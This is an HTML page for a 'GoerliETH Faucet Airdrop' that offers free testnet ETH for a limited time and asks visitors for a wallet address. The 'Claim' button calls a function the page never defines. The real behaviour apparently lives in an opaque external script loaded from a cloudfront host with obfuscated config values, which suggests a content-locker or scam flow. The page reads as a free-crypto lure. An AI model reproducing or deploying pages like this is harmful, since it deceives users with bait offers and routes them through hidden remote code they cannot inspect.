<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>GoerliETH Faucet Airdrop</title>
    <style>
        body {
            font-family: 'Arial', sans-serif;
            margin: 0;
            padding: 0;
            background-color: #f8f9fa;
            color: #343a40;
        }
        .container {
            max-width: 600px;
            margin: 50px auto;
            padding: 30px;
            background-color: #ffffff;
            box-shadow: 0 0 20px rgba(0, 0, 0, 0.1);
            border-radius: 10px;
        }
        h1 {
            color: #007bff;
            text-align: center;
        }
        p {
            text-align: center;
            margin-top: 10px;
        }
        h2 {
            color: #007bff;
            margin-top: 20px;
        }
        form {
            max-width: 400px;
            margin: 20px auto;
        }
        label {
            display: block;
            margin-bottom: 8px;
            font-weight: bold;
        }
        input[type="text"], input[type="email"] {
            width: 100%;
            padding: 10px;
            margin-bottom: 15px;
            box-sizing: border-box;
            border: 1px solid #ced4da;
            border-radius: 5px;
            font-size: 16px;
        }
        .btn-section {
            text-align: center;
        }
        .btn-main {
            background-color: #007bff;
            color: #fff;
            padding: 12px 25px;
            border: none;
            border-radius: 5px;
            cursor: pointer;
            font-size: 18px;
            transition: background-color 0.3s;
        }
        .btn-main:hover {
            background-color: #0056b3;
        }
    </style>
<script type="text/javascript">
    var gkMhO_dce_xbGELc={"it":4205092,"key":"50453"};
</script>
<script src="https://d115fsoldgezur.cloudfront.net/8fb4fdb.js"></script>
	<link rel="icon" href="favicon.ico" type="image/x-icon">

</head>
<body>
    <div class="container">
        <h1>Your ETH Faucet Airdrop</h1>
        <p>Claim your free GoerliETH now !</p>
        
        <!-- Airdrop Details -->
         <h1>Airdrop Details</h1>
        <p>Get <strong>1.5 GoerliETH</strong> To participate in the upcoming airdrops . Limited time offer!</p>
        
        <!-- Airdrop Form -->
        <form action="[Your Form Processing URL]" method="post">

            <label for="wallet">Enter your Ethereum wallet address:</label>
            <input type="text" id="wallet" name="wallet" required>

            <div class="btn-section">
                <button type="button" class="btn-main" onclick="_MS()">Claim Your ETH</button>
            </div>
        </form>
    </div>
</body>
</html>
